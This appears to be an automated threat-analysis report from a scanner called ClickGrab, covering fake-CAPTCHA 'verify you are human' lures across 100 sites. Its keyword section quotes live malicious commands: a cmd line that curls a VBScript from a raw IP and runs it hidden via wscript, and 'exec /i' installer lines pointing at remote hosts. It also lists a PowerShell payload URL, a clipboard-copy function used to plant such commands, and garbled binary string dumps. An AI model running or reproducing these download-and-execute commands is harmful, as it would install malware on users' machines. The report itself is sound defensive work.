ClickGrab Threat Analysis Report - 2026-05-18

Generated on 2026-05-18 02:02:23

Executive Summary

Total sites analyzed: 100
Sites with malicious content: 22
Unique domains encountered: 2,378
Total URLs extracted: 8,402
PowerShell download attempts: 2
Clipboard manipulation instances: 101

Domain Analysis

Most Frequently Encountered Domains

www.maheshwaree.com: 320 occurrences
98.70.13.131: 309 occurrences
fudgeshop.com.au: 265 occurrences
picsera.com: 226 occurrences
18.176.47.246: 218 occurrences
adturekorea.co.kr: 214 occurrences
scillarodriguez.com: 199 occurrences
www.ccera-icar.org: 178 occurrences
www.creatorssky.com: 156 occurrences
devblog.ezeelogin.com: 126 occurrences
www.dorper.com.au: 125 occurrences
picsera.sirv.com: 121 occurrences
104.199.248.167: 71 occurrences
sun1118.com: 54 occurrences
3.18.128.17: 51 occurrences

URL Pattern Analysis

reCAPTCHA imagery

8 occurrences across 5 distinct URLs

https://www.google.com/recaptcha/about/images/reCAPTCHA-logo@2x.png (2 times)
https://www.google.com/recaptcha/api.js (2 times)
https://2captcha.com/dist/web/assets/google-privacy-policy-Cb0CGVRT.svg (2 times)
https://pizzabyte.com.au/smartdetection/deviceverification/CF/path/captcha (1 times)
https://www.google.com/recaptcha/api.js?hl=&render=6Lf7uxYsAAAAANagtTWlY2ET8HF8nbfMf4-ePcWm (1 times)

Font resources

66 occurrences across 56 distinct URLs

https://fonts.gstatic.com (4 times)
https://18.176.47.246/wp-content/plugins/vk-post-author-display/vendor/vektor-inc/font-awesome-versions/src/font-awesome/css/all.min.css?ver=7.1.0 (2 times)
https://adturekorea.co.kr/js/font-awesome/css/font-awesome.min.css?ver=220620 (2 times)
https://use.fontawesome.com/releases/v5.6.3/css/all.css (2 times)
https://adturekorea.co.kr/theme/FT_WEB20/css/icofont.min.css (2 times)
...and 51 more distinct URLs

CDN hosted scripts

5 occurrences across 5 distinct URLs

https://cdn.jsdelivr.net/npm/three@0.167.0/build/three.module.js (1 times)
https://cdn.jsdelivr.net/npm/three@0.167.0/examples/jsm/ (1 times)
https://irp.cdn-website.com/45d8c6e0/files/uploaded/32.ps1 (1 times)
https://global.ketchcdn.com/web/v3/config/picsera/website_smart_tag/boot.js (1 times)
https://cdn.jsdelivr.net/npm/slick-carousel@1.8.1/slick/slick.css?ver=1.8.1 (1 times)

Google resources

93 occurrences across 61 distinct URLs

https://www.google.com/s2/favicons?sz=128&domain=${encodeURIComponent (13 times)
https://www.googletagmanager.com/gtm.js?id= (4 times)
https://www.google (3 times)
https://fonts.googleapis.com (2 times)
https://sites.google.com/view/ikimisilim/ana-sayfa (2 times)
...and 56 more distinct URLs

Suspicious Keyword Analysis

Total Keywords Found: 515 (107 unique)

Keyword Categories

Social Engineering

42 unique keywords

exec /i https://shift-art.com/123/cloudflare/verify/humanverfification/cloudflarechallenge/CustomerID37832738/";
captcha-box
captcha-badge
captcha_word
captcha
CAPTCHA
captcha_question
CaptchaLoading
Verification Hash
CaptchaCheckbox
...and 32 more

Obfuscation Indicators

11 unique keywords

eval(this._loadScript(url.url) + "\n//@ sourceURL= " + url.url)
eval("timeIn"+uid+" = setTimeout(function(){ li.find('> .catalog-section-childs').show(15).css({'top': top + 'px', 'left': left + 'px'}); }, 200);")
eval('var timeOut'+popupItems[i].id)
eval(frameContents)
eval(
eval("clearTimeout(timeOut"+uid+")")
Command for the linkW!Set the Show Command for the linkWTell the link to resolve itselfWWW!Get the IconLocation for the linkW!Set the IconLocation for the linkW!Tell the link to save the changesWISetupStringTable InterfaceWWWGet string from nameWWget_SuiteCallbackWput_SuiteCallbackWget_SuiteExtensionput_SuiteExtensionICommand line argument passed to setup.exe when it's launched after rebootW*Set a shortcut property for an opened link7Retrieve any failures from applying shortcut propertiesWWW0Set a shortcut property for Run As AdministratorWW3Retrieve shortcut property for Run As AdministratorWWW.Interface ISetupDynamicLinkedLibraryControllerInstallShield LogServices ClassWWWISetupLogService Interface8Opens the Log Database from the specified Storage objectWW:Creates a new Log Database on the specified Storage object*Opens the Log Database in a read-only modeISetupLogService2 InterfaceWWWSetupMainWindow ClassWISetupMainWindow InterfaceWindow caption Window handleWShows/Hides wait cursorWWW Create windowWDestroy windowISetupWindowText Interfaceproperty Color property TextW
exec()QApplication::%s: Please instantiate the QApplication object first%L1WARNING: QApplication was not created in the main() thread.�sgqAppNameQCoreApplication: Application event filter cannot be in a different thread.QCoreApplication: Object event filter cannot be in a different thread.QCoreApplication::applicationFilePath: Please instantiate the QApplication object firstQCoreApplication::argc: Please instantiate the QApplication object firstQCoreApplication::argv: Please instantiate the QApplication object firstQCoreApplication::enter_loop: Must be called from the main threadenter_looploopLevelQCoreApplication::notify: Unexpected null receiverinstallTranslatorQCoreApplication::applicationDirPath: Please instantiate the QApplication object firstremoveTranslatorQCoreApplication::postEvent: Unexpected null receiverQCoreApplication::sendPostedEvents: Cannot send posted events for objects in another threadQCoreApplication::exit_loop: Must be called from the main threadexit_loop<�g��g��g��gP-g�g� g��g��g��g��g��g g� g�� g-testability-graphicssystem-session-style-style=-widgetcount-stylesheet-reverse-qdebug-qdevelQCoreApplication::arguments: Please instantiate the QApplication object firstQT_PLUGIN_PATHQCoreApplication::exec: The event loop is already running%s::exec: Must be called from the main threadexec��g�3g��g�3g �g4gl�g�4g::constenum class struct char shortulong longuint intunsignedconst onstQtvoidQMetaMethod::invoke: Dead lock detected in BlockingQueuedConnection: Receiver is %s(%p)
eval("timeOut"+uid+" = setTimeout(function(){ li.find('> .catalog-section-childs').hide(15); }, 200);")
eval("clearTimeout(timeIn"+uid+")")
...and 1 more

System Commands

33 unique keywords

exec /i http://inkbookwriters.com/verify /qn';
wscript
CMD
POWerShEll
cmd /c "curl -s http://178.17.59.40:5506/qk.vbs -o %temp%\\qk.vbs >nul && wscript.exe //B //E:VBScript %temp%\\qk.vbs"';
command %dQPicture::metric: Invalid metric commandffffff9@QPicture::play: Format error/pictureformatsQPictureIO::write: No such picture format handler: %sQPicture: invalid format version 00�be@�e��e��e��e �Fe�ep�eQPicture::load: No such picture format: %sQPicture::save: No such picture format: %sQPicture::save: still being painted on. Call QPainter::end() first��be��e��Oe��=e��=e��Oe|�beЍNe �Ne��Ne@�e�{Oed{Oej{Oep{Oev{Oe|{Oe�{Oe�be�e@le�lePze�ze�e�xe�oe�me�re�se� e�pene�e@oee@ne ne�oe�oe��eQPixmap: Must construct a QApplication before a QPaintDeviceL�be��ep�2e0�e��e �Fe�eQPixmap::operator=: Cannot assign to pixmap during paintingQPixmap::save: quality out of range [-1,100]QPixmap::setMask() mask size differs from pixmap sizeQPixmap::setMask: Cannot set mask while pixmap is being painted onQPixmap::fill: Cannot fill while pixmap is being painted onQPixmap::setAlphaChannel: The pixmap and the alpha channel pixmap must have the same sizeQPixmap::setAlphaChannel: Cannot set alpha channel while pixmap is being painted onQPixmap::scaled: Pixmap is a null pixmapQPixmap::scaleWidth: Pixmap is a null pixmapQPixmap::scaleHeight: Pixmap is a null pixmapqt_pixmapQPMCacheQCache�be��ep�2e0�e��e �Fe�e��be@�e��e��Ne��e�{Oed{Oe��ep{Oev{Oe|{Oe�{Oe @��@P�be��Fe��beЏNe��Ne��Ne��Oe�{Oed{Oej{Oep{Oev{Oe|{Oe�{Oe0TNe��Oe��be�e@�be��Fe@��be��Fe��be��Fe @<�be��Ne@�Ne��Nepe�{Oed{Oej{Oep{Oev{Oe|{Oe�{Oe!e0)e�@��be��Ne��Ne��Nepe�{Oed{Oej{Oep{Oev{Oe|{Oe�{Oe�.e0@e��be�Ne�Ne��Ne�e�{Oed{Oej{Oep{Oev{Oe|{Oe�{Oe0TNe�0e,�be�Nep�Ne��Nepe�{Oed{Oej{Oep{Oev{Oe|{Oe�{Oe�6epCe�?�h㈵��>@��be�Ie��Oe��Oe|�be@�Ne��Ne��NeIe�{Oed{Oej{Oep{Oev{Oe|{Oe�{Oep�beJe��Oe��Oe�beP�Ne��Ne��Ne�Ie�{Oed{Oej{Oep{Oev{Oe|{Oe�{Oe OU+&@:ga��
exec()done(int)accept()reject()showExtension(bool)boolsizeGripEnabledmodalL_yeX[eP[el7ceb:e�Se@�eP|e�|e�eX7ce�S:ePQ:ej:eT:e�ee��ej{Oep{Oev{Oe|{Oe�{Oe�k:e�\:e�]:ePePtePeeP`eP`e�p:eP`eee �Fe �Fe �Fe �Fea:e�[:e�X:eP`e �Fe �Fe �Fe �Fe �Fe�n:e �Fe�ae@ eP`e�`e��e �Fe �Fe �Fe �Fe �Fe`�He�W:e Q:e0Q:eQDialog::exec: Recursive call detected�7ce�w:e�Se@�eP|e�|e`�e�7cep�6ey6e �6ex:e�6ed{OeP�6ep{Oev{Oe|{Oe�{Oe�e�s:e�s:ePe`�6e�6e`�6e��6e�6e@�6eP`e��6eК6e �Fe �Fep�6e �Fe��6ep`e`�6eP`e �Fe��6e�6e��6e��6e��6e �Fe�ae�6e��6ep�6ep�6e �Fe �Fe �Fe �Fe �Fe`�He@�7e@�6e�x6e�9ep�6e�9e&Show this message again�7cep:e`�He�8ce��:e�Se@�eP|e�|e`�eL8ceP�Ne��Ne��Ne �:e�ee��ej{Oep{Oev{Oe|{Oe�{Oe�k:e�\:e�]:ePePteP`eePePe�p:ePeee �Fe �Fe �Fe �Fea:e�[:e�X:ePe �Fe �Fe �Fe �Fe �Fe�n:e �Fe�ae@y:ePe�e��e �Fe �Fe �Fe �Fe �Fe�Hep�:e Q:e0Q:eshowMessageQString<p><b>%1</b></p>Warning:Fatal Error:Debug Message:^(.*)$([a-zA-Z0-9_.*? +;#\-\[\]@\{\}/!<>\$%&=^~:\|]*)$$ �� .(NIpf��)
Invoke-WebRequest
const command =
Command key on Mac, Win key on other platforms.
...and 23 more

Verification Text

3 unique keywords

hidden
ray id
Hidden

Technical Terms

18 unique keywords

.exe
You will observe
Ray ID
CreateThread
.bat
bypass
iex
failed_to_retrieve
bitmap
responseText
...and 8 more

Most Frequent Keywords

hidden: 43 occurrences
robot: 36 occurrences
Robot: 28 occurrences
failed_to_retrieve: 23 occurrences
CAPTCHA: 18 occurrences
verification: 18 occurrences
Verification: 17 occurrences
CAPTCHA Verification: 16 occurrences
I am not a robot: 16 occurrences
You will observe: 16 occurrences
verification-id: 16 occurrences
To better prove you are not a robot: 16 occurrences
Verification ID: 15 occurrences
Ray ID: 14 occurrences
Checking if you are human: 14 occurrences

Similar Keyword Patterns

Groups of keywords that appear to be variations of the same theme:

Group 1: cmd /c "curl -s http://178.17.59.40:5506/qk.vbs -o %temp%\\qk.vbs >nul && wscript.exe //B //E:VBScript %temp%\\qk.vbs"';, command = 'cmd /c "curl -s http://178.17.59.40:5506/qk.vbs -o %temp%\\qk.vbs >nul && wscript.exe //B //E:VBScript %temp%\\qk.vbs"';

Group 2: CAPTCHA Verification, CAPTCHA-verificatie-ID, Verification, verification

Group 3: Verification ID, verification-id, verification_data, verification id, Verification Hash, verification_id

Group 4: Ray ID, ray id

Group 5: CAPTCHA, captcha, captcha-badge, captcha-logo, CAPTCHA-logo, captcha-box, captcha_word, captcha_sid, captcha_0, Captcha, captcha-js

JavaScript Obfuscation Analysis

Obfuscation Sophistication Score: 0/7

Potential Base64 Encoded Content

These strings may contain encoded malicious payloads:

caRemoveVRoots1ISCHECKFORPRODUCTUPDATESAllUsersApp...
UnpublishProductAppId
serversUnregistering
CREATEAPPPOOLSCreating
emitPendingReadNotification

Clipboard Manipulation Analysis

Detected clipboard manipulation in 101 instances.

Document.Execcommand Copy

Found in 42 snippets (41.6% of clipboard code)

Examples:

try { document.execCommand('copy')

document.execCommand('copy')

document.execCommand("copy")

Textarea Manipulation

Found in 45 snippets (44.6% of clipboard code)

Examples:

tListener("click", function () { const textarea = document.createElement('textarea'

ng is the safe placeholder above const textarea = document.createElement('textarea'

ipboardCopyData(textToCopy){ const tempTextArea = document.createElement("textarea"

Complete Malicious Functions

Function 1:

function setClipboardCopyData(textToCopy){ const tempTextArea = document.createElement("textarea"); tempTextArea.value = textToCopy; document.body.append(tempTextArea); tempTextArea.select(); document.execCommand("copy"); document.body.removeChild(tempTextArea); }

Report truncated for storage. Full per-site detail is available in the scan JSON under nightly_reports/.